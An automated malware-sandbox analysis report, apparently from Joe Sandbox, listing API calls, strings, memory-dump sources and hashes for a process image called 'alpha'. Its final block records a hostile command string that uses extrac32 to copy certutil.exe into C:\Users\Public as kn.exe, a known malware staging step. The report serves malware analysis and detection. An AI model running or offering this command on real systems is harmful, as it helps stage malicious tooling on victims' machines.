                                                                                                  • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7823FF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823E0071
                                                                                                  • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E0092
                                                                                                  • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7823E00A7
                                                                                                  • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E0148
                                                                                                  • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7823E0181
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 734197835-0
                                                                                                  • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                  • Instruction ID: 54a6fea25f0554cbc1e8db076c6d93870db0689d90459f37e9cefedb014b2075
                                                                                                  • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                  • Instruction Fuzzy Hash: 7D61B539A0C69296E720AB11E810339FAE1FB45B46FE48179DD4D17F90DFBCA849C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Enum$Openwcsrchr
                                                                                                  • String ID: %s=%s$.$\Shell\Open\Command
                                                                                                  • API String ID: 3402383852-1459555574
                                                                                                  • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                  • Instruction ID: b3cf75c0da3c4280646940c398443d32f0a217798d3b592001d0e3c9dda04d10
                                                                                                  • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                  • Instruction Fuzzy Hash: 54A1E722A0874282EE11BB55E1602B9E3A0FF84B91FE44579DA4D07FD4EFBCE945C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$wcscmp
                                                                                                  • String ID: %s
                                                                                                  • API String ID: 243296809-3043279178
                                                                                                  • Opcode ID: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                                                                                  • Instruction ID: 71f00e4c989cc4497e46a980e7c2563a2dd49fdf61637108dc7ddce8216551b6
                                                                                                  • Opcode Fuzzy Hash: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                                                                                  • Instruction Fuzzy Hash: 6AA1C7267097C6A6EB71EB21D8613F9A390FB4474AFA04079CA4D47E94DF7CE649C310
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$EnvironmentVariable
                                                                                                  • String ID: DIRCMD
                                                                                                  • API String ID: 1405722092-1465291664
                                                                                                  • Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                                                  • Instruction ID: 7e02b81fbccff886aae52d0871d9d094b24f4f676bc82bffae2e9075cf9bc5cf
                                                                                                  • Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                                                  • Instruction Fuzzy Hash: 1B819F72A08BC28AEB20DF20E8942EDB7A4FB48349F604179DA8D67F59DF78D145C710
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823DCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDA6
                                                                                                    • Part of subcall function 00007FF7823DCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDBD
                                                                                                  • wcschr.MSVCRT(?,?,?,00007FF7823D99DD), ref: 00007FF7823D9A39
                                                                                                    • Part of subcall function 00007FF7823DDF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF7823DCEAA), ref: 00007FF7823DDFB8
                                                                                                    • Part of subcall function 00007FF7823DDF60: RtlFreeHeap.NTDLL ref: 00007FF7823DDFCC
                                                                                                    • Part of subcall function 00007FF7823DDF60: _setjmp.MSVCRT ref: 00007FF7823DE03E
                                                                                                  • wcschr.MSVCRT(?,?,?,00007FF7823D99DD), ref: 00007FF7823D9AF0
                                                                                                  • wcschr.MSVCRT(?,?,?,00007FF7823D99DD), ref: 00007FF7823D9B0F
                                                                                                    • Part of subcall function 00007FF7823D96E8: memset.MSVCRT ref: 00007FF7823D97B2
                                                                                                    • Part of subcall function 00007FF7823D96E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D9880
                                                                                                  • _wcsupr.MSVCRT ref: 00007FF7823EB844
                                                                                                  • wcscmp.MSVCRT ref: 00007FF7823EB86D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                                                                                  • String ID: FOR$ IF
                                                                                                  • API String ID: 3663254013-2924197646
                                                                                                  • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                  • Instruction ID: fb476b6ce8f89dab6913a4f0f703f0f71d813acf1cc4a096f1fa0315742a89a8
                                                                                                  • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                  • Instruction Fuzzy Hash: E551F265F08642A1FE15BB15D424279A792FF44B92FE44278D92E07FD1DFBCA805C320
                                                                                                  APIs
                                                                                                  • iswdigit.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF0D6
                                                                                                  • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7823DE626,?,?,00000000,00007FF7823E1F69), ref: 00007FF7823DF1BA
                                                                                                  • wcschr.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF1E7
                                                                                                  • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7823DE626,?,?,00000000,00007FF7823E1F69), ref: 00007FF7823DF1FF
                                                                                                  • iswdigit.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF2BB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: iswdigit$iswspacewcschr
                                                                                                  • String ID: )$=,;
                                                                                                  • API String ID: 1959970872-2167043656
                                                                                                  • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                  • Instruction ID: 69e7651ec7eb006a2c7aea50e5838aa7946d2a3d36231de1ebefab8b7a9df02a
                                                                                                  • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                  • Instruction Fuzzy Hash: BA41A165E1825286FBA47B11A5A8379F6A0BF10757FE45079C94D039E4DFBCA881C730
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                                  • String ID: %04X-%04X$:
                                                                                                  • API String ID: 930873262-1938371929
                                                                                                  • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                  • Instruction ID: 2303f4992886d11886ea6a26a4257a101506efc8bf72a7447567b18b93d00060
                                                                                                  • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                  • Instruction Fuzzy Hash: 7441B371A08A82D2EB60AB61F4102BAE761FB88742FE04179D94D43AD5DFBCD845C730
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                  • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                  • API String ID: 3249344982-2616576482
                                                                                                  • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                  • Instruction ID: 9b72dc1d955a60a0e0c3a1a2d63989fedc06ce544d4a795283208a3746420ec7
                                                                                                  • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                  • Instruction Fuzzy Hash: EE415072A18A4186E3109B12E85437ABBE4FB59F96F944278DA4D07B94CF7CD458CB20
                                                                                                  APIs
                                                                                                  • iswdigit.MSVCRT(?,?,00000000,00007FF7823E68A3,?,?,?,?,?,?,?,00000000,?,00007FF7823E63F3), ref: 00007FF7823E6A73
                                                                                                  • wcschr.MSVCRT(?,?,00000000,00007FF7823E68A3,?,?,?,?,?,?,?,00000000,?,00007FF7823E63F3), ref: 00007FF7823E6A91
                                                                                                  • wcschr.MSVCRT(?,?,00000000,00007FF7823E68A3,?,?,?,?,?,?,?,00000000,?,00007FF7823E63F3), ref: 00007FF7823E6AB0
                                                                                                  • wcschr.MSVCRT(?,?,00000000,00007FF7823E68A3,?,?,?,?,?,?,?,00000000,?,00007FF7823E63F3), ref: 00007FF7823E6AE3
                                                                                                  • wcschr.MSVCRT(?,?,00000000,00007FF7823E68A3,?,?,?,?,?,?,?,00000000,?,00007FF7823E63F3), ref: 00007FF7823E6B01
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr$iswdigit
                                                                                                  • String ID: +-~!$<>+-*/%()|^&=,
                                                                                                  • API String ID: 2770779731-632268628
                                                                                                  • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                  • Instruction ID: 09cba5dfbbd093645a12fcc8b18b573db16ea5261bd3efd23827da38a9715878
                                                                                                  • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                  • Instruction Fuzzy Hash: A5317236A08B56D5EB50AF02E460278BBE0FB45F46BA5C079DA4E43B54EF7CE548C720
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 3192234081-0
                                                                                                  • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                  • Instruction ID: 3f69d666e889f2eea9266a7a16e635a59012bb12573fbd58c628e578d99e88f1
                                                                                                  • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                  • Instruction Fuzzy Hash: 3231A032A086418BE750AF22B41867DFFA0FB89B82F909538DE4A43B95CE7CD445CB10
                                                                                                  APIs
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7823E14D6,?,?,?,00007FF7823DAA22,?,?,?,00007FF7823D847E), ref: 00007FF7823E1673
                                                                                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7823E14D6,?,?,?,00007FF7823DAA22,?,?,?,00007FF7823D847E), ref: 00007FF7823E168D
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7823E14D6,?,?,?,00007FF7823DAA22,?,?,?,00007FF7823D847E), ref: 00007FF7823E1757
                                                                                                  • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7823E14D6,?,?,?,00007FF7823DAA22,?,?,?,00007FF7823D847E), ref: 00007FF7823E176E
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7823E14D6,?,?,?,00007FF7823DAA22,?,?,?,00007FF7823D847E), ref: 00007FF7823E1788
                                                                                                  • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7823E14D6,?,?,?,00007FF7823DAA22,?,?,?,00007FF7823D847E), ref: 00007FF7823E179C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$Process$Alloc$Size
                                                                                                  • String ID:
                                                                                                  • API String ID: 3586862581-0
                                                                                                  • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                  • Instruction ID: ac99a33021fb533fbda6be3bb7c26d02231b28a8f843463e950908692cac548c
                                                                                                  • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                  • Instruction Fuzzy Hash: 0891A569A0974691EA51AB15D460379F7A0FB44B82FB58179CE5D03F90DFBCE849C320
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 1313749407-0
                                                                                                  • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                  • Instruction ID: 9db53f18be1a6affb14ff2734766408a2cb58f2f52b67e08d94ea35931275bc0
                                                                                                  • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                  • Instruction Fuzzy Hash: 9B51C825E0978262FE507B11E424279E691BF45B92FE84178CD6E17FE1DFBCE845C220
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                                  • String ID:
                                                                                                  • API String ID: 920682188-0
                                                                                                  • Opcode ID: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                                                                                  • Instruction ID: 11a0c52085214138767965d33ade0165a1f6357f4a5a1d48b5db00d3ef3865c2
                                                                                                  • Opcode Fuzzy Hash: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                                                                                  • Instruction Fuzzy Hash: C5519E36705BC18AEB25EF21E8542E8B7A0FB88B45F948079CA4D47B54EF7CD545C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF7823DE00B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$FreeProcess_setjmp
                                                                                                  • String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                  • API String ID: 777023205-3344945345
                                                                                                  • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                  • Instruction ID: 2a4768cdfede8242a8afe36b571afeccb25f500a55c4a3be4951ff18a7757101
                                                                                                  • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
